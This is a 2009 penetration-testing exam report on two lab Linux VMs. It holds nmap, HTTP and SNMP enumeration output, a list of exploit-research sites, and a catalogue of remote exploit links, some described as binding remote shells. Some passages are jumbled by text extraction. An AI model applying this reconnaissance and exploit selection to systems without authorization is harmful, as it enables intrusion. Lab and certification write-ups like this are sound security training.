Certified Penetration Tester (CPT) Practical Examination ReportMatthew Tiedeman
[email protected] February 21st, 2009 Contents 1. 2. 3. 4. Overview.......................................................................................4 Assumptions..................................................................................4 Tools.............................................................................................4 Penetration test details....................................................................5 A. Scanning...................................................................................5 i. Baseline scan of network..........................................................5 ii. Port scanning and OS fingerprinting...........................................5 iii. Service fingerprinting - TCP services.........................................7 iv. Service fingerprinting - Validation of Apache HTTP service............9 v. SNMP enumeration................................................................11 vi. Service fingerprinting - UDP services.......................................13 B. Sites used during the exploit research phase.................................14 C. Remote exploits........................................................................15 i. Research via anyside.org.........................................................15 ii. Exploits – round 1.................................................................18 iii. Research via secwatch.org.....................................................19 iv. Exploits – round 2.................................................................19 D. User discovery..........................................................................19 i. Abuse of finger......................................................................19 E. Brute force password guessing....................................................21 i. Discovery of password for “user” account..................................21 ii. Discovery of password for “cptvm1” and “cptvm2” accounts........23 F. Research of cptvm1 and cptvm2 hosts..........................................25 i. cptvm1.................................................................................25 ii. cptmv2................................................................................27 G. Penetration of cptvm1...............................................................29 i. Local exploit research via anyside.org.......................................29 ii. Local exploit research via secwatch.org....................................32 iii. Privilege escalation using a Kernel VMA exploit..........................33 iv. Maintaining access via creation of a new “r00t” account.............34 v. Gathering the shadow password file.........................................35 H. Cracking passwords of the cptvm1 host.......................................35 i. Cracking of “user”, “cptvm1” and “cptvm2”................................35 I. Penetration of cptvm2................................................................36 i. Privilege escalation using a Kernel vmsplice exploit.....................36 ii. Maintaining access via creation of a new “r00t” account..............37 iii. Gathering the shadow password file........................................38 J. Cracking passwords of the cptvm2 host........................................39 i. Cracking of “cptvm1”, “cptvm2”, “root” and “r00t”.......................39 K. Cracking passwords of the cptvm1 host – round 2.........................40 i. Cracking of “root” and “r00t”...................................................40 L. Ultimate goal............................................................................43 i. Cptvm1 and ctpvm2 hosts compromised...................................43 ii. Passwords for root accounts on cptvm1 and cptvm2...................43 M. Lessons learned.......................................................................43 i. Searching exploit sites............................................................43 ii. Attack vectors.......................................................................44 5. Appendix.....................................................................................44 A. Source code for the Kernel 2.4 VMA exploit...................................44 B. Source code for the Kernel 2.6 vmsplice exploit.............................59 ! httprint – HTTP fingerprinting utility.168. 2.pl – SNMP enumeration utility.168.org The following information was provided as part of the examination documentation: ! Virtual machine 1 (cptvm1) – VM containing a Linux system.168. etc compiler. ! vi – Text editor. Assumptions ! ! While the penetration testing process consists of 5 phases (reconnaissance. ! back|track3 – Collection of penetration tester utilities. ! snmpenum. penetration. the details of all of the penetration test findings and a prioritized list of the vulnerabilities discovered. the reconnaissance and covering tracks phases will not be covered within this report. the recovery of the root passwords for each system and the creation of a penetration report.1.200 # Netmask: 255. " The system has been configured to gain its network information via DHCP.254 ! Virtual machine 2 (cptvm2) – VM containing a Linux system. ! emacs – A “swiss army knife” editor (text/source code/etc). The penetration report should be submitted for review to:
[email protected]. at a minimum. ! Information gathered from one of the VM's during the penetration test may be required in order to compromise the other VM.1.1. scanning. Overview The certified pen tester practical examination consists of the compromising of two VMware virtual machines. maintaining connectivity and covering tracks). Stealthy scanning and penetration techniques will not be used. " The system has the following static configuration: # IP Address: 192. The penetration report will contain. fingerprinting.0 # Gateway: 192.255. ! Apple OSX – Host operating system used to execute VMware Fusion. “swiss army knife” utility.254 # DNS: 192. ! tftp – Trivial File Transfer Protocol client ! ssh – Secure shell client . ! gcc – C.1. ! VMware Fusion – VMware virtual host software for OSX. 3. Tools The following tools were used during the completion of the penetration testing practical examination. ! nmap – Port scanning. 168. password cracker. MAC Address: 00:0C:29:27:60:0A (VMware) Nmap done: 256 IP addresses (4 hosts up) scanned in 3.1. At this point.200) cptvm2 (192.1. Port scanning and OS fingerprinting To determine the open ports and host operating system.200) were identified.168.30).104) and cptvm1 (192.1.168.! ! ! ! ! ! ! ! finger – Finger utility. Scanning i.168.168. Penetration test details A. host computer (192. The gateway (192.168. hydra – Multiple protocol dictionary attack utility.1.168.60 ( http://nmap.1.1).168.1/24 Starting Nmap 4.1. the systems of interest are configured as follows: cptvm1 (192. aspell – Dictionary utility.168.org ) at 2009-01-19 07:59 GMT Host 192. .168. MAC Address: 00:0C:29:3B:43:BC (VMware) Host 192.1.1.168. Baseline scan of network An initial scan of the network was performed to establish a baseline of the network configuration. MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer) Host 192. back| track3 (192.104) ii.102). MAC Address: XX:XX:XX:XX:XX:XX (Cisco-Linksys) Host 192.1. awk – Lightweight regular expression text scripting utility. sed – A stream editing utility.104 appears to be up. sort – Unix text sort utility.200 appears to be up.1.1 appears to be up.102 appears to be up.168.30 appears to be up. the UDP scan was completed only on ports from 1 to 1024. the identification of the hosts and their use comes mainly from the exam documentation and the knowledge of how the local network is configured.168. Due to the differences between TCP and UDP. John the ripper. 4. a port scan and OS fingerprint of the specific VM IP addresses was conducted.1. The port scan included all TCP ports from 1 to 65535.1. MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer) Host 192. bash shell scripting – Small scripts and main interactive shell.1. cptvm2 (192. bt live # nmap -sP -n 192.269 seconds From the information gathered during this step. 321 seconds bt live # nmap -sU -T5 -n -p1-1024 192. 2 undergoing UDP Scan UDP Scan Timing: About 24.X OS details: Linux 2.37% done.168.1.104. ETC: 15:54 (0:01:08 remaining) . 192.1.168. it can be concluded that cptvm1.2. Stats: 0:00:20 elapsed.168. While cptvm2.1.18 .Based upon the list of open ports.2.104 Starting Nmap 4.121 days (since Tue Jan 20 09:11:03 2009) Network Distance: 1 hop Interesting ports on 192.18% done.6.9 .200: Not shown: 65517 closed ports PORT STATE SERVICE 7/tcp open echo 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 79/tcp open finger 80/tcp open http 109/tcp open pop2 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 199/tcp open smux 443/tcp open https 686/tcp open unknown 993/tcp open imaps 995/tcp open pop3s 6000/tcp open X11 32768/tcp open unknown 32770/tcp open sometimes-rpc3 MAC Address: 00:0C:29:27:60:0A (VMware) Device type: general purpose Running: Linux 2.org/submit/ .1.org ) at 2009-01-20 15:53 GMT Warning: Giving up on port early because retransmission cap hit.4.60 ( http://nmap. Please report any incorrect results at http://nmap.89% done.23 Uptime: 0.60 ( http://nmap. bt live # nmap -sS -O -n -p1-65535 192. ETC: 15:54 (0:01:11 remaining) Stats: 0:00:22 elapsed.1.168.4. is most likely a server.104: Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind 939/tcp open unknown MAC Address: 00:0C:29:3B:43:BC (VMware) Device type: general purpose Running: Linux 2.6.104 Starting Nmap 4.168.1.1.X OS details: Linux 2.106 days (since Tue Jan 20 09:32:16 2009) Network Distance: 1 hop OS detection performed.200. 0 hosts completed (2 up).4. ETC: 15:54 (0:01:09 remaining) Stats: 0:00:22 elapsed. 2 undergoing UDP Scan UDP Scan Timing: About 22.168.168.6. 0 hosts completed (2 up). 192.200 192.32 (likely embedded) Uptime: 0. is most likely a client workstation. Nmap done: 2 IP addresses (2 hosts up) scanned in 19.org ) at 2009-01-20 12:04 GMT Interesting ports on 192. 0 hosts completed (2 up).168.1.200 192. 2 undergoing UDP Scan UDP Scan Timing: About 24. 6.99) 23/tcp open telnet Linux telnetd 79/tcp open finger Linux fingerd 80/tcp open http Apache httpd 2. the systems of interest are configured as follows: cptvm1 (192. 143. 21. 2 undergoing UDP Scan UDP Scan Timing: About 25.993.TCP services As a TCP port number does not directly identify a service.1. 32768.315rh 199/tcp open smux Linux SNMP multiplexer 443/tcp open ssl/http Apache httpd 2.686.1.18 . 443.79.32770 192. 199.995.1. 23.109111.168.0.6000.org ) at 2009-01-20 12:27 GMT Interesting ports on 192.4.05% done.40 ((Red Hat Linux)) 686/tcp open rquotad 1-2 (rpc #100011) 993/tcp open imaps? 995/tcp open pop3s? .0.1.1.200: PORT STATE SERVICE VERSION 7/tcp open echo 21/tcp open ftp vsftpd 1. 995. fingerprinting of the services listening on the ports is required.21-23.168.143.168.229 seconds From the information gathered during this step.200) Operating system: Linux Kernel version: Linux 2. 32770 UDP ports: 7. 993. 110. 37 cptvm2 (192.104 are open|filtered (872) or closed (152) MAC Address: 00:0C:29:3B:43:BC (VMware) Nmap done: 2 IP addresses (2 hosts up) scanned in 146.168.32 TCP ports: 7.60 ( http://nmap. 22. ETC: 15:54 (0:01:08 remaining) Interesting ports on 192. 0 hosts completed (2 up).168.2.199.Stats: 0:00:23 elapsed. The remaining services.168.23 TCP ports: 22.32768.9 . Service fingerprinting . port 109. 6000. 686. bt live # nmap -sV --version-all -n -p7.200: Not shown: 870 open|filtered ports. 939 iii. 79.80.104) Operating system: Linux Kernel version: Linux 2.6. 109. 80.5p1 (protocol 1.1.78rh 111/tcp open rpcbind 2 (rpc #100000) 143/tcp open imap UW Imapd 2001. port 993 and port 995 will require further research to properly fingerprint. 13.200 Starting Nmap 4.4. 151 closed ports PORT STATE SERVICE 7/udp open echo 13/udp open daytime 37/udp open time MAC Address: 00:0C:29:27:60:0A (VMware) All 1024 scanned ports on 192.1. 111. The majority of the TCP services were fingerprinted via nmap.2.3 22/tcp open ssh OpenSSH 3. 111.443.40 ((Red Hat Linux)) 109/tcp open pop2? 110/tcp open pop3 ipopd 2001. 168. Please report any incorrect results at http://nmap.60. 22.104) Operating system: Linux 110. Linux Service detection performed.200\]\x20v2001\. 32770 UDP ports: 7.315rh Linux SNMP multiplexer Apache httpd 2.168\.1\. Nmap done: 1 IP address (1 host up) scanned in 11. 995.111.1.4B."\+\x20POP2\x20\[192\. SF:"\+\x20POP2\x20\[192\.200) Operating system: Linux Kernel version: Linux 2.0. vsftpd 1. 37 TCP services: 7/tcp echo 21/tcp ftp 22/tcp ssh 23/tcp telnet 79/tcp finger 80/tcp http 109/tcp POSSIBLY pop2 110/tcp pop3 111/tcp rpcbind 143/tcp imap 199/tcp smux 443/tcp ssl/http 686/tcp rquotad 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 32770/tcp mountd cptvm2 (192.6000/tcp open X11 (access denied) 32768/tcp open status 1 (rpc #100024) 32770/tcp open mountd 1-3 (rpc #100005) 1 service unrecognized despite returning data.3 OpenSSH 3. 6000.168.3 (protocol 2.168.0.168. Please report any incorrect results at http://nmap.18 .1.939 192.977 seconds bt live # nmap -sV --version-all -n -p22. please submit the following fingerprint at http://www.200.org/submit/ .1. 21.63rh\x20server SF:\x20ready\r\n-\x20Missing\x20or\x20null\x20command\r\n")%r(Verifier.168\.org/cgi-bin/servicefp-submit.63rh\x20server\x20ready\r SF:\n-\x20Bogus\x20or\x20out\x20of\x20sequence\x20command\x20-\x20SUBSCRIB SF:E\r\n"). 686. Nmap done: 1 IP address (1 host up) scanned in 225.40 (Red Hat Linux) ipopd 2001. 13. 199.32 TCP ports: 7.insecure. 23.1.org ) at 2009-01-20 12:33 GMT Interesting ports on 192.0) 111/tcp open rpcbind 2 (rpc #100000) 939/tcp open status 1 (rpc #100024) MAC Address: 00:0C:29:3B:43:BC (VMware) Service detection performed.99) Linux telnetd Linux fingerd Apache httpd 2. 79.4. 143.4. If you know the service/version. 443. MAC Address: 00:0C:29:27:60:0A (VMware) Service Info: Host: 192.168. 993. OSs: Unix.cgi : SF-Port109-TCP:V=4.78rh 2 (rpc #100000) UW Imapd 2001.1.5p1 (protocol 1. 32768.org/submit/ .2.200\]\x20v2001\.104: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.1\.60%I=9%D=1/20%Time=4975C33E%P=i686-pc-linux-gnu%r(Gener SF:icLines. 109.358 seconds From the information gathered during this step. the systems of interest are configured as follows: cptvm1 (192.60 ( http://nmap.40 (Red Hat Linux) 1-2 (rpc #100011) 1 (rpc #100024) 1-3 (rpc #100005) .1. 80. 111.104 Starting Nmap 4. txt httprint v0.0.96 Apache/1.19 Orion/2.2.com/httprint/
[email protected]: 101 53.45 Apache-Tomcat/4.86 Apache/1.200 Derived Signature: Apache/2.x: 106 63.301 (beta) .0.39 Agranat-EmWeb: 76 19.45 Microsoft-IIS/6.42 Apache/1.0x: 73 16. bt linux # httprint -h 192.19 CompaqHTTPServer/1. The httprint utility was utilized to insure that the web server is actually Apache.200 -s signatures. ltd.12 TUX/2.64 Netscape-Enterprise/6.6.40 (Red Hat Linux) Banner Deduced: Apache/2. the use of the Apache web server was validated.3.200:80/ Finger Printing Completed on http://192.56 .com Finger Printing on http://192.168.see readme.0-Apache/1.25 AkamaiGHost: 50 3.0: 64 9.25 Netscape-Enterprise/4.0 (Linux): 89 34.0: 69 13. In this case.30 HP-ChaiServer/3.0: 47 2.[1-3]: 96 45.[4-24]: 101 53.3.0.64 cisco-IOS: 54 4.Kernel version: Linux 2. 111.86 -----------------------Scores: Apache/2.1.2.6.168.0) 2 (rpc #100000) 1 (rpc #100024) iv.07 UPnP/1.x: 65 10.38 AssureLogic/2.168.1.168.26: 100 52.23 TCP ports: 22.1.0: 53 4. 939 TCP services: 22/tcp ssh 111/tcp rpcbind 939/tcp status OpenSSH 4.3.20 Stronghold/4.40 (Red Hat Linux) 9E431BC86ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC5 0D7645B5811C9DC52A200B4CCD37187C11DDC7D7811C9DC5811C9DC58A91CF57 FCCC535BE2CE6920FCCC535B811C9DC5E2CE6927050C5D33E2CE69279E431BC8 6ED3C295E2CE69262A200B4CE2CE6920E2CE6920E2CE6920E2CE6920E2CE6923 E2CE6923E2CE6920811C9DC5E2CE6927E2CE6923 Banner Reported: Apache/2.200:80/ -------------------------------------------------Host: 192.3.74 Oracle Servlet Engine: 58 6.9 .11 Apache/1. .x: 68 12.41 RomPager/4.3 (protocol 2.0.1: 53 4.0: 54 4.0: 46 2.web server fingerprinting tool (c) 2003-2005 net-square solutions pvt.3.1.txt http://net-square.Validation of Apache HTTP service Often the banner for a web server is disguised to hide the true web server that is running.6: 86 30.0: 44 1. Service fingerprinting .04 Microsoft-IIS/5.x Score: 106 Confidence: 63.96 Apache/1.29: 67 11.74 Lotus-Domino/6.1. 43 Resin/3.x: 43 1.79 Jetty (unverified): 40 0.25 Zeus/4.2: 30 0.2: 11 0.38 Microsoft-IIS/5.3.2: 20 0.6 SP2: 29 0.1b1: 41 0.19 Microsoft ISA Server (internal): 10 0.44 TightVNC: 24 0.19 Netgear MR814v2 .19 3Com/v1.1 Google Web Server: 24 0.56 thttpd: 44 1.43 fnord: 20 0.2: 23 0.3: 14 0.NET: 44 1.19 Allied Telesyn Ethernet switch: 10 0.19 .x: 27 0.1: 14 0.96 Microsoft ISA Server (external): 40 0.0: 26 0.2: 38 0.33 Netscape-Enterprise/3.34 Xerver_v3: 43 1.4.01 Webmin: 20 0.0: 31 0.21 Jana Server/1.56 WebSitePro/2.Microsoft-IIS/5.6: 20 0.45 Microsoft-IIS/URLScan: 21 0.96 Zope/2.1: 12 0.8: 19 0.5.1G: 44 1.30 Tomcat Web Server/3.79 IDS-Server/3.23 Intel NetportExpressPro/1.0: 22 0.38 Adaptec ASM 1.32 Netscape-Enterprise/3.2.IP_SHARER WEB 1.45 JRun Web Server: 22 0.21 RemotelyAnywhere: 10 0.4: 28 0.56 Com21 Cable Modem: 44 1.48 CompaqHTTPServer/4.0: 10 0.18: 44 1.5.0.0 ASP.1: 44 1.36 Lotus-Domino/5.30 EHTTP/1.45 squid/2.0: 10 0.2.22 Cisco Pix 6.56 Stronghold/2.5.56 Boa/0.39 Oracle XML DB/Oracle9i: 17 0.11: 44 1.3 edna/0.44 NetWare-Enterprise-Web-Server/5.01: 20 0.38 Linksys AP2: 28 0.56 Netscape-Enterprise/3.4.0 Virtual Host: 17 0.34 ServletExec: 41 0.43 HP Jet-Direct Print Server: 25 0.1: 17 0.22 AOLserver/3.1: 31 0.STABLE5: 23 0.1: 41 0.12: 31 0.27 Netscape-Enterprise/4.6.36 BaseHTTP/0.42 RealVNC/4.44 Netscape-Enterprise/3.1: 27 0.x: 15 0.19 WebSENSE/1.43 MiniServ/0.43 Zeus/4.39 Linksys with Talisman firmware: 27 0.2.0: 25 0.1: 14 0.0 ZServer/1.44 GWS/2.0: 10 0.0: 36 0.3.2-Apache/1.41 WebLogic Server 8.4.43 Hewlett Packard xjet: 25 0.2-3.39 WebLogic Server 8.94.1: 24 0.23 Cisco-HTTP: 11 0.21 Ipswitch-IMail/8.1: 36 0.43 Tcl-Webserver/3.56 Microsoft-IIS/5.21 EMWHTTPD/1.44 Linksys WRTP54G: 24 0.56 Lexmark Optra Printer: 44 1.45: 31 0.3 Python/2p3.45 SunONE WebServer 6.96 WebLogic XMLX Module 8.5.30 Surgemail webmail (DManager): 14 0.43 MiniServ/0.30 Jetty/4. 00 v. the cptvm1 host OS was identified as Linux.02 VisualRoute 2005 Server Edition: 34 0.00 NetPort Software 1.pl 192.01 Ubicom/1.8: 34 0.00 NetBuilderHTTPDv0. 161. In addition.00 Linksys BEFSR41/BEFSR11/BEFSRU31: 0 0.200.01 Snap Appliances.0: 0 0.00 MailEnable-HTTP/5.1 802. 111.6: 34 0.14.1: 0 0.01 Tanberg 880 video conf: 2 0.02 Ubicom/1. the snmpenum.0: 34 0. Inc.200 public linux. 631 and 683.46 ---------------------------------------HOSTNAME ---------------------------------------cptvm1 ---------------------------------------RUNNING SOFTWARE PATHS ---------------------------------------init keventd kapmd ksoftirqd_CPU0 kswapd kscand/DMA kscand/Normal kscand/HighMem bdflush ---------------------------------------RUNNING PROCESSES ---------------------------------------init keventd .1: 0 0. Along with UDP ports 7. With these two factors in mind.168.02 Domino-Go-Webserver/4.00 Linksys AP1: 0 0. 40:22. SNMP enumeration The snmp service was identified as listening on port 199/tcp of the cptvm1 host. 123.12 Zeus/4_2: 33 0. 162.1: 2 0.1.MikroTik RouterOS: 35 0.00 Linksys Router: 0 0.02 JC-HTTPD/1.18: 34 0. 192.6.1.02 SMC Wireless Router 7004VWBR: 34 0.pl utility can be utilized to gather system information. various process and service information was discovered.2.5./3.02 AOLserver/3. 13.00 Linksys Print Server: 0 0.txt ---------------------------------------UPTIME ---------------------------------------1 hour. Of particular interest are the UDP services currently running on the hosts.2: 33 0.02 dwhttpd (Sun Answerbook): 34 0.11b: 2 0.168.02 Belkin Wireless router: 34 0. bt snmpenum # snmpenum.07 Microsoft-IIS/4. 37.07 CompaqHTTPServer-SSL/4.x: 1 0. 20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 ---------------------------------------LISTENING UDP PORTS ---------------------------------------7 13 37 111 123 161 162 631 683 ---------------------------------------LISTENING TCP PORTS ---------------------------------------7 21 22 23 79 80 109 110 111 From the information gathered during this step. 995. 443.0. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1. 993.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001. 21. 23.1.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2.5p1 (protocol 1. 80.1. 109. 111. 32768.4.168.4.3 22/tcp ssh OpenSSH 3.kapmd ksoftirqd_CPU0 kswapd kscand/DMA kscand/Normal kscand/HighMem bdflush ---------------------------------------MOUNTPOINTS ---------------------------------------/ /proc/bus/usb /boot /dev/shm Real Memory Swap Space Memory Buffers ---------------------------------------SYSTEM INFO ---------------------------------------Linux cptvm1 2. 686. the systems of interest are configured as follows: cptvm1 (192. 143. 110.200) Operating system: Linux Kernel version: 2.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001.20-8 TCP ports: 7.315rh . 22. 6000. 79. 199. 80.631.0) 2 (rpc #100000) 1 (rpc #100024) vi.6.37. 111.23 TCP ports: 22.1. bt linux # nmap -sU -sV --version-all -n -p7.org/submit/ .40 (Red Hat Linux) . 6000. 199. 631.1.168. 162. 37.162. 21.1.199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2.161. 939 TCP services: 22/tcp ssh 111/tcp rpcbind 939/tcp status OpenSSH 4. 995.20-8 TCP ports: 7. 161. 123. 79. Therefore.0. the systems of interest are configured as follows: cptvm1 (192. 32768.UDP services Like TCP ports.13.1. 109.200: PORT STATE SERVICE VERSION 7/udp open echo 13/udp open daytime 37/udp open time (32 bits) 111/udp open rpcbind 2 (rpc #100000) 123/udp open|filtered ntp 161/udp open snmp SNMPv1 server (public) 162/udp open|filtered snmptrap 631/udp open|filtered unknown 683/udp open rquotad 1-2 (rpc #100011) MAC Address: 00:0C:29:27:60:0A (VMware) Service detection performed.683 192. All UDP services except port 631 were properly fingerprinted.104) Operating system: Linux Kernel version: Linux 2. the services listening on the UDP ports will need to be fingerprinted. 13. 111. Service fingerprinting . 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1. Nmap done: 1 IP address (1 host up) scanned in 51. 993.168.5p1 (protocol 1. Please report any incorrect results at http://nmap.168. 143.org ) at 2009-01-20 12:54 GMT Interesting ports on 192.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2. 22. 110. 443.2.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7.200 Starting Nmap 4.3 22/tcp ssh OpenSSH 3.9 . 23. UDP ports do not directly identify services.467 seconds From the information gathered during this step. 111.60 ( http://nmap.6. 683 cptvm2 (192. 686.4.0.200) Operating system: Linux Kernel version: 2.111.1.123.168.3 (protocol 2. remote-exploit.com/exploits/ . http://secwatch. 683 UDP services: 7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp 161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) cptvm2 (192.0) 2 (rpc #100000) 1 (rpc #100024) B.Exploits database and securityforest exploits update script.brandonhutchinson.Exploits database http://www.php – Exploit information. milw0rm and securityfocus exploit update scripts. 111.Contains packetstormsecurity exploits update script.Exploits information.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001.6.Exploits database http://packetstormsecurity. . http://www.Exploits database http://www. 123.securiteam.org .org/ . http://www. 631.milw0rm.com/ .109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001.104) Operating system: Linux Kernel version: Linux 2. http://anyside. http://www.html – Exploit information.net/security/exploits/ . http://www.org/exploits.Exploit database. http://www. it does provide fairly good coverage: http://www.com/exploits/ .Contains back|track.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7.org/sploits.6.3 (protocol 2. http://www.com/ . 162. 13.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2.23 TCP ports: 22. Sites used during the exploit research phase There are various sites available for the research of software exploits.org/ .iss.2. 939 TCP services: 22/tcp ssh 111/tcp rpcbind 939/tcp status OpenSSH 4.net/ – Exploits information.com . While the following list is not all inclusive. 161.9 . 37.securityforest.Archive of private exploits and proof-of-concept codes developed by VUPEN Security.Exploit information.168.governmentsecurity.0.vupen.org/ . http://insecure. 111.hoobie.1. com/index. http://www. A list of search items was then created based upon the findings from the scanning phase. http://www.txt | sort -u > possible_remote_200...http://www.org A list of exploits was downloaded from the anyside./commands/remote-search.illmob.Security advisories.shtml – Exploit platform. Remote exploits i.org web site. Research via anyside.Exploits information.txt | grep -w -i -f .c.Remote Windows exploit for the RPC DCOM long filename heap overflow discovered by NSFOCUS..anyside.immunitysec.security-protocols.org/ .org/exp/exploits/remote/101_ncat.com/ .org/exp/exploits/remote/09. http://metasploit.Exploit information. http://www.txt .malware.com ./ Feb 6 14:40 exploits_list.txt $ ll total 1664 drwxr-xr-x drwxr-xr-x -rw-r--r--rw-r--r--rw-r--r-- 6 16 1 1 1 matt matt matt matt matt matt matt matt matt matt 204 544 126720 702666 9376 Feb 21 14:46 .com – Exploit information and hacking techniques.tgz Sep 21 05:52 exploits_list.txt Feb 6 14:43 possible_remote_200. The list consisted of a small description of the exploit and a link to the source code for the exploit. Related advisory ...org – Exploit platform.txt $ cat possible_remote_200. http://www.txt apache finger imap ipop ntp open ssh openssh rpc rpcbind rpcmount rpcstatus rquota snmp snmptrap telnet vs ftp vsftp x11 The search items list and the exploit list were used to gain a list of possible remote exploits for the cptvm1 host..datastronghold..c.http://www.anyside..4 .MS03-039-exp../commands/remotesearch. C..http://www..16. Remote Buffer Overflow Exploit v0.MailEnable .db. IMAP Service. $ cat . $ grep exploits\/remote exploits_list./ Feb 21 14:46 . .anyside.3 and 2.Remote buffer overflow in MDaemon IMAP and SMTP server 2004-9-3.3..6.anyside.7 Remote Buffer Overflow Exploit 2005-04-25.. and 8 telnetd remote exploit.http://www.52 and earlier DoS .Snmppd SNMP proxy daemon format string exploit .GoodTech Telnet Server < 5.org/exp/exploits/remote/apache-squ1rt.c.c..anyside.. Binds cmd.Exploit that makes use of the mod_userdir vulnerability in various Apache 1..anyside.0.http://www. 7. 2003-12-8. Tested against OverflowGuard and StackDefender (with kernel32 imagebase randomization) running on Windows 2000 SP0 and Windows XP SP0.http://www.. 2004-4-25...c..Remote root exploit for rpc..0.Remote exploit for Apache + OpenSSL v0.org/exp/exploits/remote/mounty..http://www.http://www. Tested again Windows 2000 SP3 and Windows NT 4 SP6a.c...txt. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.9.org/exp/exploits/remote/wts_bo.http://www.ADM mountd exploit .txt.Checks Apache webservers for a wrong default configuration of mod_userdir which allows account name guessing and then attempts to login to the found accounts with ftp.http://www.c.anyside.http://www.org/exp/exploits/remote/Snmppd.Denial of service test exploit for the flaw in Apache httpd 2.c.c.= 2.. Tested on Win32 and Unix..Windows remote rpc dcom exploit which bypasses non-executable stack protection by using return into libc.c.49 ..org/exp/exploits/remote/ADMmountd. Includes targets for Windows 2000 and XP.. .mountd 2.Solaris 2.http://www.48 remote users disclosure exploit .MS04011 Lsasrv.......org/exp/exploits/remote/goodtech_expl.anyside.txt.x servers.anyside.http://www. 2003-9-18.Remote exploit utilizing the DCOM RPC overflow discovered by LSD...6d and below. Effective against Linux and *BSD boxes.anyside.c.org/exp/exploits/remote/wgetusr.http://www. ..anyside.gz.anyside.2-r1 auth_debug() Remote Format String Exploit 2005-03-17.c..Microsoft Windows RPC Locator Service remote exploit..http://www.org/exp/exploits/remote/goodtech.7 Remote BoF Exploit 2005-04-30...Jordan Windows Telnet Server v1..3 and 2.c..http://www.dll RPC ms04011 buffer overflow Remote Exploit 2004-5-2..txt.0...http://www.Ipswitch IMAP Server "LOGIN" Command Remote Stack Overflow Exploit .Apache <.c.org/exp/exploits/remote/sm00nycourier_imap_fsx.Linux rpc.Courier-IMAP <..mountd that makes use of the xlog off-by-one vulnerability discussed 2004-1-4.http://www.org/exp/exploits/remote/lsasrv.0.Windows Lsasrv.org/exp/exploits/remote/apache_xpl.0. Binds a shell on port 4444.org/exp/exploits/remote/MercuryMail-exp.anyside..org/exp/exploits/remote/HOD-ms04011-lsasrvexpl.c... ..anyside.Exploit code for the Mercury32 IMAP Rename buffer overflow .c.org/exp/exploits/remote/m00-apache-w00t.anyside.anyside.*-2.c.http://www.org/exp/exploits/remote/rpcexp..anyside.http://www.http://www.tar.c.dll RPC buffer overflow remote exploit 2004-9-24.anyside.http://www..anyside..0.c.http://www.= 3.3.anyside.52 HTTP GET Remote Denial of Service Exploit .http://www.org/exp/exploits/remote/telnet.org/exp/exploits/remote/OpenFuckV2...http://www.*-2.. ...anyside.org/exp/exploits/remote/m00-apache-w00t.anyside.http://www.http://www.. Binds a shell on port 9191..2beta29 remote root exploit ..http://www..org/exp/exploits/remote/dcom.Windows port of the remote exploit utilizing the DCOM RPC overflow originally coded by H D Moore..0.org/exp/exploits/remote/DComExpl_UnixWin32..org/exp/exploits/remote/getusr..0.anyside.c.01 (Pegasus) IMAP Buffer Overflow .org/exp/exploits/remote/rpc!exec.Apache 1.Exploit that makes use of the mod_userdir vulnerability in various Apache 1.anyside.anyside.zip. .anyside.org/exp/exploits/remote/ipswitch..http://www.GoodTech Telnet Server < 5.org/exp/exploits/remote/mdaemon_imap.x servers..c.2 remote buffer overflow exploit.anyside. .48 mod_userdir remote users disclosure Exploit 2003-4-1..Apache 2.c.org/exp/exploits/remote/Mercury-IMAP-exp. ..org/exp/exploits/remote/httpdDoS-pl.anyside.Mercury Mail 4.exe to port 5151.Apache 1.. 0.http://www.org/exp/exploits/remote/2006031901.Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4) 2007-03-24.Apache < 1.org/exp/exploits/remote/2007033002.org/exp/exploits/remote/2006082105.http://www.anyside.org/exp/exploits/remote/2007101401.IPSwitch IMAP Server LOGON Remote Stack Overflow 2005-09-20.txt.http://www.3 p1 (Duplicated Block) Remote Denial of Service Exploit 2007-01-15.txt.2.txt.anyside.ypupdated Remote Root Exploit (meta) 2008-04-06.txt.txt.Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit 2007-02-01.txt.http://www.anyside.anyside.anyside.txt.txt.http://www.http://www.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit 2007-03-10.http://www.2.18 (Netfilter NAT SNMP Module) Remote DoS Exploit 2006-07-23.txt.Mercur Mailserver 5.org/exp/exploits/remote/2006091101.Debian .MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) 2008-04-04.58 mod_rewrite Remote Overflow Exploit (win2k3) 2007-05-30.anyside.anyside.anyside.org/exp/exploits/remote/2007011502.0.Mercur Mailserver 5.txt.0.http://www.Mercury Mail <= 4. 